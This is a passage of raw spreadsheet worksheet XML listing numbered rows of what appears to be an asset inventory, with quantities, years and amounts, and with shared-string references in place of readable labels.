      <c r="B207" s="11">
        <v>199</v>
      </c>
      <c r="C207" s="11"/>
      <c r="D207" s="10" t="s">
        <v>806</v>
      </c>
      <c r="E207" s="10" t="s">
        <v>807</v>
      </c>
      <c r="F207" s="9" t="s">
        <v>808</v>
      </c>
      <c r="G207" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H207" s="11">
        <v>1</v>
      </c>
      <c r="I207" s="11">
        <v>2007</v>
      </c>
      <c r="J207" s="91"/>
      <c r="K207" s="99">
        <v>672</v>
      </c>
      <c r="L207" s="10" t="s">
        <v>616</v>
      </c>
      <c r="M207" s="225"/>
    </row>
    <row r="208" ht="14.25" customHeight="1" spans="2:13">
      <c r="B208" s="16">
        <v>200</v>
      </c>
      <c r="C208" s="11"/>
      <c r="D208" s="10" t="s">
        <v>493</v>
      </c>
      <c r="E208" s="9" t="s">
        <v>809</v>
      </c>
      <c r="F208" s="9"/>
      <c r="G208" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H208" s="16">
        <v>3</v>
      </c>
      <c r="I208" s="16">
        <v>2005</v>
      </c>
      <c r="J208" s="91"/>
      <c r="K208" s="99">
        <v>9936</v>
      </c>
      <c r="L208" s="10" t="s">
        <v>616</v>
      </c>
      <c r="M208" s="225"/>
    </row>
    <row r="209" ht="14.25" customHeight="1" spans="2:13">
      <c r="B209" s="226" t="s">
        <v>810</v>
      </c>
      <c r="C209" s="227"/>
      <c r="D209" s="228"/>
      <c r="E209" s="10"/>
      <c r="F209" s="14"/>
      <c r="G209" s="11"/>
      <c r="H209" s="11"/>
      <c r="I209" s="11"/>
      <c r="J209" s="91"/>
      <c r="K209" s="99">
        <v>0</v>
      </c>
      <c r="L209" s="10"/>
      <c r="M209" s="225"/>
    </row>
    <row r="210" ht="14.25" customHeight="1" spans="2:13">
      <c r="B210" s="11">
        <v>201</v>
      </c>
      <c r="C210" s="11"/>
      <c r="D210" s="10" t="s">
        <v>811</v>
      </c>
      <c r="E210" s="10" t="s">
        <v>812</v>
      </c>
      <c r="F210" s="9" t="s">
        <v>813</v>
      </c>
      <c r="G210" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H210" s="11">
        <v>1</v>
      </c>
      <c r="I210" s="11">
        <v>1992</v>
      </c>
      <c r="J210" s="91"/>
      <c r="K210" s="99">
        <v>4800</v>
      </c>
      <c r="L210" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M210" s="225"/>
    </row>
    <row r="211" ht="14.25" customHeight="1" spans="2:13">
      <c r="B211" s="11">
        <v>202</v>
      </c>
      <c r="C211" s="237" t="s">
        <v>815</v>
      </c>
      <c r="D211" s="238" t="s">
        <v>816</v>
      </c>
      <c r="E211" s="238" t="s">
        <v>817</v>
      </c>
      <c r="F211" s="14"/>
      <c r="G211" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H211" s="11">
        <v>2</v>
      </c>
      <c r="I211" s="237" t="s">
        <v>818</v>
      </c>
      <c r="J211" s="91">
        <v>9401.71</v>
      </c>
      <c r="K211" s="99">
        <v>46080</v>
      </c>
      <c r="L211" s="238" t="s">
        <v>819</v>
      </c>
      <c r="M211" s="225"/>
    </row>
    <row r="212" ht="14.25" customHeight="1" spans="2:13">
      <c r="B212" s="11">
        <v>203</v>
      </c>
      <c r="C212" s="237" t="s">
        <v>820</v>
      </c>
      <c r="D212" s="10" t="s">
        <v>536</v>
      </c>
      <c r="E212" s="238" t="s">
        <v>821</v>
      </c>
      <c r="F212" s="14"/>
      <c r="G212" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H212" s="11">
        <v>1</v>
      </c>
      <c r="I212" s="237" t="s">
        <v>462</v>
      </c>
      <c r="J212" s="91">
        <v>16250</v>
      </c>
      <c r="K212" s="99">
        <v>5985</v>
      </c>
      <c r="L212" s="238" t="s">
        <v>822</v>
      </c>
      <c r="M212" s="225"/>
    </row>
    <row r="213" ht="14.25" customHeight="1" spans="2:13">
      <c r="B213" s="11">
        <v>204</v>
      </c>
      <c r="C213" s="237" t="s">
        <v>823</v>
      </c>
      <c r="D213" s="238" t="s">
        <v>824</v>
      </c>
      <c r="E213" s="10"/>
      <c r="F213" s="14"/>
      <c r="G213" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H213" s="11">
        <v>1</v>
      </c>
      <c r="I213" s="237" t="s">
        <v>825</v>
      </c>
      <c r="J213" s="91">
        <v>5128.21</v>
      </c>
      <c r="K213" s="99">
        <v>2080</v>
      </c>
      <c r="L213" s="238" t="s">
        <v>826</v>
      </c>
      <c r="M213" s="225"/>
    </row>
    <row r="214" ht="14.25" customHeight="1" spans="2:13">
      <c r="B214" s="11">
        <v>205</v>
      </c>
      <c r="C214" s="237" t="s">
        <v>827</v>
      </c>
      <c r="D214" s="238" t="s">
        <v>828</v>
      </c>
      <c r="E214" s="238" t="s">
        <v>829</v>
      </c>
      <c r="F214" s="14"/>
      <c r="G214" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H214" s="11">
        <v>2</v>
      </c>
      <c r="I214" s="237" t="s">
        <v>830</v>
      </c>
      <c r="J214" s="91">
        <v>9401.71</v>
      </c>
      <c r="K214" s="99">
        <v>2688</v>
      </c>
      <c r="L214" s="238" t="s">
        <v>831</v>
      </c>
      <c r="M214" s="225"/>
    </row>
    <row r="215" ht="14.25" customHeight="1" spans="2:13">
      <c r="B215" s="11">
        <v>206</v>
      </c>
      <c r="C215" s="11"/>
      <c r="D215" s="10" t="s">
        <v>832</v>
      </c>
      <c r="E215" s="10" t="s">
        <v>833</v>
      </c>
      <c r="F215" s="9" t="s">
        <v>834</v>
      </c>
      <c r="G215" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H215" s="11">
        <v>2</v>
      </c>
      <c r="I215" s="11">
        <v>1992</v>
      </c>
      <c r="J215" s="91"/>
      <c r="K215" s="99">
        <v>128000</v>
      </c>
      <c r="L215" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M215" s="225"/>
    </row>
    <row r="216" ht="14.25" customHeight="1" spans="2:13">
      <c r="B216" s="11">
        <v>207</v>
      </c>
      <c r="C216" s="11"/>
      <c r="D216" s="10" t="s">
        <v>835</v>
      </c>
      <c r="E216" s="10"/>
      <c r="F216" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G216" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H216" s="11">
        <v>3</v>
      </c>
      <c r="I216" s="11">
        <v>1992</v>
      </c>
      <c r="J216" s="91"/>
      <c r="K216" s="99">
        <v>720</v>
      </c>
      <c r="L216" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M216" s="225"/>
    </row>
    <row r="217" ht="14.25" customHeight="1" spans="2:13">
      <c r="B217" s="11">
        <v>208</v>
      </c>
      <c r="C217" s="11"/>
      <c r="D217" s="10" t="s">
        <v>837</v>
      </c>
      <c r="E217" s="10" t="s">
        <v>838</v>
      </c>
      <c r="F217" s="9"/>
      <c r="G217" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H217" s="11">
        <v>2</v>
      </c>
      <c r="I217" s="11">
        <v>1992</v>
      </c>
      <c r="J217" s="91"/>
      <c r="K217" s="99">
        <v>6400</v>
      </c>
      <c r="L217" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M217" s="225"/>
    </row>
    <row r="218" ht="14.25" customHeight="1" spans="2:13">
      <c r="B218" s="11">
        <v>209</v>
      </c>
      <c r="C218" s="11"/>
      <c r="D218" s="10" t="s">
        <v>536</v>
      </c>
      <c r="E218" s="10" t="s">
        <v>839</v>
      </c>
      <c r="F218" s="9"/>
      <c r="G218" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H218" s="11">
        <v>2</v>
      </c>
      <c r="I218" s="11">
        <v>2005</v>
      </c>
      <c r="J218" s="91"/>
      <c r="K218" s="99">
        <v>5670</v>
      </c>
      <c r="L218" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M218" s="225"/>
    </row>
    <row r="219" ht="14.25" customHeight="1" spans="2:13">
      <c r="B219" s="11">
        <v>210</v>
      </c>
      <c r="C219" s="11"/>
      <c r="D219" s="10" t="s">
        <v>840</v>
      </c>
      <c r="E219" s="10" t="s">
        <v>841</v>
      </c>
      <c r="F219" s="9"/>
      <c r="G219" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H219" s="11">
        <v>2</v>
      </c>
      <c r="I219" s="11"/>
      <c r="J219" s="91"/>
      <c r="K219" s="99">
        <v>2800</v>
      </c>
      <c r="L219" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M219" s="225"/>
    </row>
    <row r="220" ht="14.25" customHeight="1" spans="2:13">
      <c r="B220" s="11">
        <v>211</v>
      </c>
      <c r="C220" s="11"/>
      <c r="D220" s="10" t="s">
        <v>842</v>
      </c>
      <c r="E220" s="10"/>
      <c r="F220" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G220" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H220" s="11">
        <v>2</v>
      </c>
      <c r="I220" s="11"/>
      <c r="J220" s="91"/>
      <c r="K220" s="99">
        <v>4400</v>
      </c>
      <c r="L220" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M220" s="225"/>
    </row>
    <row r="221" ht="14.25" customHeight="1" spans="2:13">
      <c r="B221" s="11">
        <v>212</v>
      </c>
      <c r="C221" s="11"/>
      <c r="D221" s="10" t="s">
        <v>843</v>
      </c>
      <c r="E221" s="10"/>
      <c r="F221" s="9"/>
      <c r="G221" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H221" s="11">
        <v>2</v>
      </c>
      <c r="I221" s="11"/>
      <c r="J221" s="91"/>
      <c r="K221" s="99">
        <v>1360</v>
      </c>
      <c r="L221" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M221" s="225"/>
    </row>
    <row r="222" ht="14.25" customHeight="1" spans="2:13">
      <c r="B222" s="11">
        <v>213</v>
      </c>
      <c r="C222" s="11"/>
      <c r="D222" s="10" t="s">
        <v>844</v>
      </c>
      <c r="E222" s="10"/>
      <c r="F222" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G222" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H222" s="11">
        <v>2</v>
      </c>
      <c r="I222" s="11"/>
      <c r="J222" s="91"/>
      <c r="K222" s="99">
        <v>2480</v>
      </c>
      <c r="L222" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M222" s="225"/>
    </row>
    <row r="223" ht="14.25" customHeight="1" spans="2:13">
      <c r="B223" s="11">
        <v>214</v>
      </c>
      <c r="C223" s="11"/>
      <c r="D223" s="10" t="s">
        <v>845</v>
      </c>
      <c r="E223" s="10"/>
      <c r="F223" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G223" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H223" s="11">
        <v>2</v>
      </c>
      <c r="I223" s="11"/>
      <c r="J223" s="91"/>
      <c r="K223" s="99">
        <v>1120</v>
      </c>
      <c r="L223" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M223" s="225"/>
    </row>
    <row r="224" ht="14.25" customHeight="1" spans="2:13">
      <c r="B224" s="11">
        <v>215</v>
      </c>
      <c r="C224" s="11"/>
      <c r="D224" s="10" t="s">
        <v>846</v>
      </c>
      <c r="E224" s="10"/>
      <c r="F224" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G224" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H224" s="11">
        <v>2</v>
      </c>
      <c r="I224" s="11"/>
      <c r="J224" s="91"/>
      <c r="K224" s="99">
        <v>720</v>
      </c>
      <c r="L224" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M224" s="225"/>
    </row>
    <row r="225" ht="14.25" customHeight="1" spans="2:13">
      <c r="B225" s="11">
        <v>216</v>
      </c>
      <c r="C225" s="11"/>
      <c r="D225" s="10" t="s">
        <v>847</v>
      </c>
      <c r="E225" s="10"/>
      <c r="F225" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G225" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H225" s="11">
        <v>2</v>
      </c>
      <c r="I225" s="11"/>
      <c r="J225" s="91"/>
      <c r="K225" s="99">
        <v>480</v>
      </c>
      <c r="L225" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M225" s="225"/>
    </row>
    <row r="226" ht="14.25" customHeight="1" spans="2:13">
      <c r="B226" s="11">
        <v>217</v>
      </c>
      <c r="C226" s="11"/>
      <c r="D226" s="10" t="s">
        <v>848</v>
      </c>
      <c r="E226" s="10"/>
      <c r="F226" s="9"/>
      <c r="G226" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H226" s="11">
        <v>3</v>
      </c>
      <c r="I226" s="11"/>
      <c r="J226" s="91"/>
      <c r="K226" s="99">
        <v>960</v>
      </c>
      <c r="L226" s="10"/>
      <c r="M226" s="225"/>
    </row>
    <row r="227" ht="14.25" customHeight="1" spans="2:13">
      <c r="B227" s="11">
        <v>218</v>
      </c>
      <c r="C227" s="11"/>
      <c r="D227" s="10" t="s">
        <v>849</v>
      </c>
      <c r="E227" s="10"/>
      <c r="F227" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G227" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H227" s="11">
        <v>2</v>
      </c>
      <c r="I227" s="11"/>
      <c r="J227" s="91"/>
      <c r="K227" s="99">
        <v>3200</v>
      </c>
      <c r="L227" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M227" s="225"/>
    </row>
    <row r="228" ht="14.25" customHeight="1" spans="2:13">
      <c r="B228" s="11">
        <v>219</v>
      </c>
      <c r="C228" s="11"/>
      <c r="D228" s="10" t="s">
        <v>850</v>
      </c>
      <c r="E228" s="10"/>
      <c r="F228" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G228" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H228" s="11">
        <v>2</v>
      </c>
      <c r="I228" s="11"/>
      <c r="J228" s="91"/>
      <c r="K228" s="99">
        <v>360</v>
      </c>
      <c r="L228" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M228" s="225"/>
    </row>
    <row r="229" ht="14.25" customHeight="1" spans="2:13">
      <c r="B229" s="11">
        <v>220</v>
      </c>
      <c r="C229" s="11"/>
      <c r="D229" s="10" t="s">
        <v>851</v>
      </c>
      <c r="E229" s="10"/>
      <c r="F229" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G229" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H229" s="11">
        <v>2</v>
      </c>
      <c r="I229" s="11"/>
      <c r="J229" s="91"/>
      <c r="K229" s="99">
        <v>2400</v>
      </c>
      <c r="L229" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M229" s="225"/>
    </row>
    <row r="230" ht="14.25" customHeight="1" spans="2:13">
      <c r="B230" s="11">
        <v>221</v>
      </c>
      <c r="C230" s="11"/>
      <c r="D230" s="10" t="s">
        <v>845</v>
      </c>
      <c r="E230" s="10"/>
      <c r="F230" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G230" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H230" s="11">
        <v>2</v>
      </c>
      <c r="I230" s="11"/>
      <c r="J230" s="91"/>
      <c r="K230" s="99">
        <v>1120</v>
      </c>
      <c r="L230" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M230" s="225"/>
    </row>
    <row r="231" ht="14.25" customHeight="1" spans="2:13">
      <c r="B231" s="11">
        <v>222</v>
      </c>
      <c r="C231" s="11"/>
      <c r="D231" s="10" t="s">
        <v>852</v>
      </c>
      <c r="E231" s="10"/>
      <c r="F231" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G231" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H231" s="11">
        <v>2</v>
      </c>
      <c r="I231" s="11"/>
      <c r="J231" s="91"/>
      <c r="K231" s="99">
        <v>640</v>
      </c>
      <c r="L231" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M231" s="225"/>
    </row>
    <row r="232" ht="14.25" customHeight="1" spans="2:13">
      <c r="B232" s="11">
        <v>223</v>
      </c>
      <c r="C232" s="11"/>
      <c r="D232" s="10" t="s">
        <v>853</v>
      </c>
      <c r="E232" s="10"/>
      <c r="F232" s="9"/>
      <c r="G232" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H232" s="11">
        <v>2</v>
      </c>
      <c r="I232" s="11"/>
      <c r="J232" s="91"/>
      <c r="K232" s="99">
        <v>480</v>
      </c>
      <c r="L232" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M232" s="225"/>
    </row>
    <row r="233" ht="14.25" customHeight="1" spans="2:13">
      <c r="B233" s="11">
        <v>224</v>
      </c>
      <c r="C233" s="11"/>
      <c r="D233" s="10" t="s">
        <v>854</v>
      </c>
      <c r="E233" s="10"/>
      <c r="F233" s="9"/>
      <c r="G233" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H233" s="11">
        <v>2</v>
      </c>
      <c r="I233" s="11"/>
      <c r="J233" s="91"/>
      <c r="K233" s="99">
        <v>480</v>
      </c>
      <c r="L233" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M233" s="225"/>
    </row>
    <row r="234" ht="14.25" customHeight="1" spans="2:13">
      <c r="B234" s="11">
        <v>225</v>
      </c>
      <c r="C234" s="11"/>
      <c r="D234" s="10" t="s">
        <v>855</v>
      </c>
      <c r="E234" s="10"/>
      <c r="F234" s="9"/>
      <c r="G234" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H234" s="11">
        <v>2</v>
      </c>
      <c r="I234" s="11"/>
      <c r="J234" s="91"/>
      <c r="K234" s="99">
        <v>720</v>
      </c>
      <c r="L234" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M234" s="225"/>
    </row>
    <row r="235" ht="14.25" customHeight="1" spans="2:13">
      <c r="B235" s="11">
        <v>226</v>
      </c>
      <c r="C235" s="11"/>
      <c r="D235" s="10" t="s">
        <v>856</v>
      </c>
      <c r="E235" s="10"/>
      <c r="F235" s="9"/>
      <c r="G235" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H235" s="11">
        <v>2</v>
      </c>
      <c r="I235" s="11"/>
      <c r="J235" s="91"/>
      <c r="K235" s="99">
        <v>960</v>
      </c>
      <c r="L235" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M235" s="225"/>
    </row>
    <row r="236" ht="14.25" customHeight="1" spans="2:13">
      <c r="B236" s="11">
        <v>227</v>
      </c>
      <c r="C236" s="11"/>
      <c r="D236" s="10" t="s">
        <v>857</v>
      </c>
      <c r="E236" s="10"/>
      <c r="F236" s="9"/>
      <c r="G236" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H236" s="11">
        <v>2</v>
      </c>
      <c r="I236" s="11"/>
      <c r="J236" s="91"/>
      <c r="K236" s="99">
        <v>1400</v>
      </c>
      <c r="L236" s="10" t="s">
        <v>814</v>
      </c>
      <c r="M236" s="225"/>
    </row>
    <row r="237" ht="14.25" customHeight="1" spans="2:13">
      <c r="B237" s="226" t="s">
        <v>858</v>
      </c>
      <c r="C237" s="227"/>
      <c r="D237" s="228"/>
      <c r="E237" s="10"/>
      <c r="F237" s="14"/>
      <c r="G237" s="11"/>
      <c r="H237" s="11"/>
      <c r="I237" s="11"/>
      <c r="J237" s="91"/>
      <c r="K237" s="99">
        <v>0</v>
      </c>
      <c r="L237" s="10"/>
      <c r="M237" s="225"/>
    </row>
    <row r="238" ht="14.25" customHeight="1" spans="2:13">
      <c r="B238" s="11">
        <v>228</v>
      </c>
      <c r="C238" s="237" t="s">
        <v>859</v>
      </c>
      <c r="D238" s="238" t="s">
        <v>860</v>
      </c>
      <c r="E238" s="238" t="s">
        <v>861</v>
      </c>
      <c r="F238" s="14"/>
      <c r="G238" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H238" s="11">
        <v>1</v>
      </c>
      <c r="I238" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J238" s="91">
        <v>166000</v>
      </c>
      <c r="K238" s="99">
        <v>1440</v>
      </c>
      <c r="L238" s="238" t="s">
        <v>862</v>
      </c>
      <c r="M238" s="225"/>
    </row>
    <row r="239" ht="14.25" customHeight="1" spans="2:13">
      <c r="B239" s="11">
        <v>229</v>
      </c>
      <c r="C239" s="237" t="s">
        <v>863</v>
      </c>
      <c r="D239" s="238" t="s">
        <v>864</v>
      </c>
      <c r="E239" s="10"/>
      <c r="F239" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G239" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H239" s="11">
        <v>1</v>
      </c>
      <c r="I239" s="237" t="s">
        <v>326</v>
      </c>
      <c r="J239" s="91">
        <v>34000</v>
      </c>
      <c r="K239" s="99">
        <v>5888</v>
      </c>
      <c r="L239" s="238" t="s">
        <v>865</v>
      </c>
      <c r="M239" s="225"/>
    </row>
    <row r="240" ht="14.25" customHeight="1" spans="2:13">
      <c r="B240" s="11">
        <v>230</v>
      </c>
      <c r="C240" s="237" t="s">
        <v>866</v>
      </c>
      <c r="D240" s="238" t="s">
        <v>867</v>
      </c>
      <c r="E240" s="10"/>
      <c r="F240" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G240" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H240" s="11">
        <v>1</v>
      </c>
      <c r="I240" s="237" t="s">
        <v>326</v>
      </c>
      <c r="J240" s="91">
        <v>32000</v>
      </c>
      <c r="K240" s="99">
        <v>5888</v>
      </c>
      <c r="L240" s="238" t="s">
        <v>865</v>
      </c>
      <c r="M240" s="225"/>
    </row>
    <row r="241" ht="14.25" customHeight="1" spans="2:13">
      <c r="B241" s="11">
        <v>231</v>
      </c>
      <c r="C241" s="237" t="s">
        <v>868</v>
      </c>
      <c r="D241" s="238" t="s">
        <v>869</v>
      </c>
      <c r="E241" s="238" t="s">
        <v>870</v>
      </c>
      <c r="F241" s="9" t="s">
        <v>834</v>
      </c>
      <c r="G241" s="11" t="s">
        <v>466</v>
      </c>
      <c r="H241" s="11">
        <v>1</v>
      </c>
      <c r="I241" s="237" t="s">
        <v>871</v>
      </c>
      <c r="J241" s="91">
        <v>81600</v>
      </c>
      <c r="K241" s="99">
        <v>259200</v>
      </c>
      <c r="L241" s="238" t="s">
        <v>872</v>
      </c>
      <c r="M241" s="225"/>
    </row>
    <row r="242" ht="14.25" customHeight="1" spans="2:13">
      <c r="B242" s="11">
        <v>232</v>
      </c>
      <c r="C242" s="11"/>
      <c r="D242" s="10" t="s">
        <v>840</v>
      </c>
      <c r="E242" s="10"/>
      <c r="F242" s="9"/>
      <c r="G242" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H242" s="11">
        <v>1</v>
      </c>
      <c r="I242" s="11">
        <v>1997</v>
      </c>
      <c r="J242" s="91"/>
      <c r="K242" s="99">
        <v>1200</v>
      </c>
      <c r="L242" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M242" s="225"/>
    </row>
    <row r="243" ht="14.25" customHeight="1" spans="2:13">
      <c r="B243" s="11">
        <v>233</v>
      </c>
      <c r="C243" s="11"/>
      <c r="D243" s="10" t="s">
        <v>873</v>
      </c>
      <c r="E243" s="10"/>
      <c r="F243" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G243" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H243" s="11">
        <v>1</v>
      </c>
      <c r="I243" s="11">
        <v>1997</v>
      </c>
      <c r="J243" s="91"/>
      <c r="K243" s="99">
        <v>320</v>
      </c>
      <c r="L243" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M243" s="225"/>
    </row>
    <row r="244" ht="14.25" customHeight="1" spans="2:13">
      <c r="B244" s="11">
        <v>234</v>
      </c>
      <c r="C244" s="11"/>
      <c r="D244" s="10" t="s">
        <v>842</v>
      </c>
      <c r="E244" s="10"/>
      <c r="F244" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G244" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H244" s="11">
        <v>1</v>
      </c>
      <c r="I244" s="11">
        <v>1997</v>
      </c>
      <c r="J244" s="91"/>
      <c r="K244" s="99">
        <v>2400</v>
      </c>
      <c r="L244" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M244" s="225"/>
    </row>
    <row r="245" ht="14.25" customHeight="1" spans="2:13">
      <c r="B245" s="11">
        <v>235</v>
      </c>
      <c r="C245" s="11"/>
      <c r="D245" s="10" t="s">
        <v>874</v>
      </c>
      <c r="E245" s="10"/>
      <c r="F245" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G245" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H245" s="11">
        <v>1</v>
      </c>
      <c r="I245" s="11">
        <v>1997</v>
      </c>
      <c r="J245" s="91"/>
      <c r="K245" s="99">
        <v>680</v>
      </c>
      <c r="L245" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M245" s="225"/>
    </row>
    <row r="246" ht="14.25" customHeight="1" spans="2:13">
      <c r="B246" s="11">
        <v>236</v>
      </c>
      <c r="C246" s="11"/>
      <c r="D246" s="10" t="s">
        <v>875</v>
      </c>
      <c r="E246" s="10"/>
      <c r="F246" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G246" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H246" s="11">
        <v>1</v>
      </c>
      <c r="I246" s="11">
        <v>1997</v>
      </c>
      <c r="J246" s="91"/>
      <c r="K246" s="99">
        <v>480</v>
      </c>
      <c r="L246" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M246" s="225"/>
    </row>
    <row r="247" ht="14.25" customHeight="1" spans="2:13">
      <c r="B247" s="11">
        <v>237</v>
      </c>
      <c r="C247" s="11"/>
      <c r="D247" s="10" t="s">
        <v>876</v>
      </c>
      <c r="E247" s="10"/>
      <c r="F247" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G247" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H247" s="11">
        <v>1</v>
      </c>
      <c r="I247" s="11">
        <v>1997</v>
      </c>
      <c r="J247" s="91"/>
      <c r="K247" s="99">
        <v>240</v>
      </c>
      <c r="L247" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M247" s="225"/>
    </row>
    <row r="248" ht="14.25" customHeight="1" spans="2:13">
      <c r="B248" s="11">
        <v>238</v>
      </c>
      <c r="C248" s="11"/>
      <c r="D248" s="10" t="s">
        <v>844</v>
      </c>
      <c r="E248" s="10"/>
      <c r="F248" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G248" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H248" s="11">
        <v>2</v>
      </c>
      <c r="I248" s="11">
        <v>1997</v>
      </c>
      <c r="J248" s="91"/>
      <c r="K248" s="99">
        <v>2480</v>
      </c>
      <c r="L248" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M248" s="225"/>
    </row>
    <row r="249" ht="14.25" customHeight="1" spans="2:13">
      <c r="B249" s="11">
        <v>239</v>
      </c>
      <c r="C249" s="11"/>
      <c r="D249" s="10" t="s">
        <v>877</v>
      </c>
      <c r="E249" s="10"/>
      <c r="F249" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G249" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H249" s="11">
        <v>1</v>
      </c>
      <c r="I249" s="11">
        <v>1997</v>
      </c>
      <c r="J249" s="91"/>
      <c r="K249" s="99">
        <v>680</v>
      </c>
      <c r="L249" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M249" s="225"/>
    </row>
    <row r="250" ht="14.25" customHeight="1" spans="2:13">
      <c r="B250" s="11">
        <v>240</v>
      </c>
      <c r="C250" s="11"/>
      <c r="D250" s="10" t="s">
        <v>878</v>
      </c>
      <c r="E250" s="10"/>
      <c r="F250" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G250" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H250" s="11">
        <v>1</v>
      </c>
      <c r="I250" s="11">
        <v>1997</v>
      </c>
      <c r="J250" s="91"/>
      <c r="K250" s="99">
        <v>560</v>
      </c>
      <c r="L250" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M250" s="225"/>
    </row>
    <row r="251" ht="14.25" customHeight="1" spans="2:13">
      <c r="B251" s="11">
        <v>241</v>
      </c>
      <c r="C251" s="11"/>
      <c r="D251" s="10" t="s">
        <v>879</v>
      </c>
      <c r="E251" s="10"/>
      <c r="F251" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G251" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H251" s="11">
        <v>1</v>
      </c>
      <c r="I251" s="11">
        <v>1997</v>
      </c>
      <c r="J251" s="91"/>
      <c r="K251" s="99">
        <v>200</v>
      </c>
      <c r="L251" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M251" s="225"/>
    </row>
    <row r="252" ht="14.25" customHeight="1" spans="2:13">
      <c r="B252" s="11">
        <v>242</v>
      </c>
      <c r="C252" s="11"/>
      <c r="D252" s="10" t="s">
        <v>849</v>
      </c>
      <c r="E252" s="10"/>
      <c r="F252" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G252" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H252" s="11">
        <v>4</v>
      </c>
      <c r="I252" s="11">
        <v>1997</v>
      </c>
      <c r="J252" s="91"/>
      <c r="K252" s="99">
        <v>2400</v>
      </c>
      <c r="L252" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M252" s="225"/>
    </row>
    <row r="253" ht="14.25" customHeight="1" spans="2:13">
      <c r="B253" s="11">
        <v>243</v>
      </c>
      <c r="C253" s="11"/>
      <c r="D253" s="10" t="s">
        <v>845</v>
      </c>
      <c r="E253" s="10"/>
      <c r="F253" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G253" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H253" s="11">
